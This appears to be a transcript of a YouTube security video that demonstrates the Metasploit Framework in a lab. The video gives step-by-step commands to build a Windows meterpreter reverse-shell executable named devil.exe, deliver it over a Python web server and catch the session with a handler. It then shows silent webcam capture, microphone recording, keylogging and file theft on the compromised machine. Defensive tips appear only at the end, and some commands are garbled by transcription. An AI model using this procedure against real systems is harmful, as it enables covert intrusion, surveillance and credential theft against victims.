What if I told you that right now, someone could be monitoring every keystroke you type on your computer? What if I told you they could silently activate your webcam and watch you without any indication that it's recording? But here's the most alarming part. All of this could happen through a single innocent-looking file that takes seconds to execute. Welcome back to Tech Sky. Today, we're exposing one of the most powerful hacking frameworks that has been used in countless cyber attacks worldwide, the Metasploit Framework. I'll demonstrate exactly how attackers can create malicious files that give them complete control over Windows systems, accessing everything from your webcam and microphone to your files and keyboard input. More importantly, you'll learn how to protect your systems from these devastating attacks. Before we begin, I need to make something absolutely clear. Everything demonstrated in this video is strictly for educational purposes only. The knowledge you're about to gain comes with significant responsibility. Understanding these techniques is crucial for recognizing and defending against these attacks, but using these methods to target actual people is not only unethical, but illegal in most jurisdictions worldwide. All our demonstrations today will be performed in a controlled laboratory environment using our own testing devices. We will not be targeting any real users or computers. Today's video is comprehensive and packed with detailed information, so grab your notebook. We're going to cover everything from setting up Metasploit to creating malicious payloads and seeing just how much access these tools can provide to attackers. Your computer is your digital sanctuary, where you store precious photos, handle sensitive financial information, and connect with loved ones. Most people believe their systems are secure until it's too late. Imagine an invisible intruder silently watching everything you do. Your personal files browse through at leisure. Your webcam activated without your knowledge. Your passwords and credit card details recorded as you type them. These aren't hypothetical scenarios. They're the daily reality of thousands of victims who unwittingly installed what they thought was legitimate software. What makes these attacks so devastating is their stealth. Unlike ransomware that announces its presence, these backdoor attacks operate silently, sometimes for months or years. The most dangerous predator isn't the one that roars, it's the one you never notice until it's already too late. Today, I'll show you the exact techniques attackers use, not to enable harm, but to illuminate the shadows where these threats lurk. Knowledge is your most powerful defense in this invisible war. Let's begin by setting up our environment in Kali Linux. Open your terminal and run sudo apt-update. This refreshes your package lists, ensuring you have access to the latest software versions. Next, run sudo apt-upgrade to install any available updates. When prompted, type Y to continue. Keeping your system updated is essential for security. Now we need to identify our machine's IP address. Type ifconfig and press enter. Look for your IP address, typically found under ETH0 or WLAN0. Copy this IP address. We'll need it for our payload creation. Let's navigate to our documents folder, where we'll save our payload. Type CD documents and press enter. Now we'll use a tool called MSFVenom to create our malicious payload. MSFVenom is part of the Metasploit framework and allows us to generate various types of payloads. Type the following command: MSFVenom, pwindows, x64 meterpreter reverse TCP, lhost equals, followed by your IP address, then lport equals 1122-fxe-odevil.exe. Let me explain what this command does. We're creating a Windows 64-bit payload that will establish a meterpreter reverse TCP connection. Lhost specifies our attacker machine's IP address, where the compromised system will connect back to. Lport sets the port number to 1122 for this connection. The -fxe flag formats our payload as a Windows executable file, and -odevil.exe names our output file. MSFVenom will now generate our malicious executable. This might take a few moments. What's happening is that the tool is creating a seemingly harmless Windows program that, when executed, will establish a hidden connection back to our attacker machine. Once the generation is complete, type ls to confirm that our devil.exe file was created successfully. Now we need a way to deliver this file to our target system. In real attack scenarios, hackers might use phishing emails, compromised websites, or social engineering techniques. For our demonstration, we'll use a simple Python web server. Type python 3-mhttp.server8080 and press enter. This starts a basic web server on port 8080, making all files in our current directory accessible via a web browser. Now that our payload is ready and our web server is running, we need to set up a handler to receive the connection when the payload is executed. Open a new terminal and type sudo msf console to launch the Metasploit Framework console. This is the command line interface for the powerful Metasploit exploitation framework. Once Metasploit loads, type use exploit/multi/handler and press enter. This module handles incoming connections from our payload. Now we need to set the matching payload type. Type set payload windows, x64 meterpreter, reverse TCP and press enter. Let's check what options we need to configure. Type options and press enter. You'll see that we need to set lhost to our IP address. Type set lhost, followed by your IP address and press enter. Next, type set lport1122 to set the listening port to match our payload. Type options again to verify that everything is configured correctly. Now type run or exploit to start the handler. The handler is now listening and waiting for a connection from any system that runs our payload. Now switch to our Windows test system. Open a web browser and enter the attacker machine's IP address, followed by :880 in the address bar. You should see a directory listing that includes our devil.exe file. Click on it to download the file. When you try to run the file, Windows might show security warnings. In a real attack scenario, social engineering would be used to convince victims to bypass these warnings. For our demonstration, we'll click Run Anyway to proceed. Now, switch back to your Kali Linux terminal running Metasploit. Within moments, you should see a message indicating that a meterpreter session has been established. This means we now have a connection to the target Windows system. Now that we have a meterpreter session established, let's explore some of its powerful capabilities. First, let's gather some basic information about the system. Type sysinfo and press enter. This command returns details about the operating system, computer name, and architecture of the compromised system. Next, type getuid to see which user account our payload is running under. This shows us the privilege level we currently have on the system. Let's check the network configuration of the target system. Type ipconfig to display all network interfaces and IP addresses. We can also see what processes are running on the system. Type ps to list all running processes. This information can be useful for understanding what software is installed and potentially identifying security tools that might detect our presence. Let's explore the file system. Type pwd to show our current directory and ls to list the files in that directory. We can even download files from the target system. Type download tech sky.png to download this file to our Kali Linux machine. The file will be saved in our current working directory. Go back to your Kali Linux file explorer and check that the file has been downloaded successfully. Now, let's access the command shell of the target system. Type shell and press enter. This gives us a standard Windows command prompt. Type, who am I to verify the user account we're running under? When you're done with the shell, type exit to return to the meterpreter prompt. Meterpreter includes some extremely invasive surveillance capabilities that demonstrate just how dangerous these attacks can be. Let's capture an image from the target system's webcam. Type webcam snap and press enter. This takes a single photo using the webcam without giving any indication to the user that the camera has been activated. No lights, no notifications, completely silent. The captured image is saved to your Kali Linux machine. You can find it in the same directory where you launched Metasploit. For continuous surveillance, we can even stream the webcam. type webcam stream, and press enter. This opens a browser window showing a live feed from the target's webcam. To stop the streaming, close the browser window and press Ctrl-C in your terminal. We can also record audio from the target's microphone. Type record, mic-d10, and press enter. This records 10 seconds of audio through the microphone. Again, this happens silently, without any indication to the user. The audio file is saved on your Kali Linux machine. You can play it to hear whatever was captured. Perhaps the most invasive capability is keylogging. Type keyscan start to begin capturing all keystrokes typed on the target system. Now, on the target Windows machine, open a web browser and type something, for example, subscribe to TechSky. Back in the MeterPreter session, type keyscan dump to view the captured keystrokes. You can see everything that was typed, including passwords, messages, or sensitive information. When you're done, type keyscan stop to end the keylogging session. Now that we understand the capabilities of these attacks, let's discuss how to protect yourself. First, make sure your Windows Defender or antivirus is enabled. On your Windows system, type virus in the search bar and open virus and threat protection. Ensure that real-time protection is turned on. Also verify that Windows Defender firewall is active. This adds another layer of protection against unauthorized connections. If you suspect your system may be compromised, remove any suspicious files immediately. Try to delete the malicious file, in our case, devil.exe. You might notice that it can't be deleted while it's running. You'll need to restart the system first, then delete the file. But these basic measures aren't enough against sophisticated attacks. Here are more comprehensive protection strategies. Only download software from trusted official sources. Be extremely cautious about running executable files from emails or unfamiliar websites. Keep your operating system and applications updated with the latest security patches. Many attacks exploit known vulnerabilities that have already been fixed. Use strong, unique passwords for all accounts and enable two-factor authentication whenever possible. Consider using a comprehensive security solution that includes behavior-based detection, which can identify suspicious activities even from previously unknown threats. Disable macros in Microsoft Office documents unless absolutely necessary. Malicious macros are a common attack vector. Use limited user accounts for day-to-day activities rather than administrator accounts. This restricts what malware can do, even if it infects your system. Regularly back up your important data to an offline source. This ensures you can recover your files if your system is compromised. Consider using network monitoring tools that can detect unusual outbound connections, which might indicate a compromised system trying to communicate with an attacker. Today, we've seen the frightening capabilities of the Metasploit framework and how easily attackers can gain complete control over Windows systems. From accessing files to recording from webcams and microphones, these tools give attackers unprecedented access to victims' digital and personal lives. What makes these attacks particularly concerning is their stealth. Without proper security measures, these infections can remain undetected for extended periods, while continuously harvesting sensitive information. Remember, the knowledge shared in this video is meant to help you understand these threats and protect against them, never to cause harm. Always operate within legal and ethical boundaries. If you found this demonstration valuable for your security journey, smash that like button right now. It really helps the channel reach more people who need this critical information. And if you haven't already, hit subscribe and turn on notifications so you never miss our latest security insights. For those of you who want to support TechSky and get exclusive content, consider becoming a channel member. Share this video with your friends and family. You might be helping someone avoid becoming a victim of these attacks. The more people understand these threats, the safer we all become. I love hearing from you, so drop a comment sharing your thoughts on computer security or suggesting what security topic you'd like me to cover next. Your feedback shapes the future content of this channel, and I read every single comment. Remember, knowledge is power, but with power comes responsibility. Until next time, Stay curious, stay ethical, and keep learning. This is Tech Sky, signing off.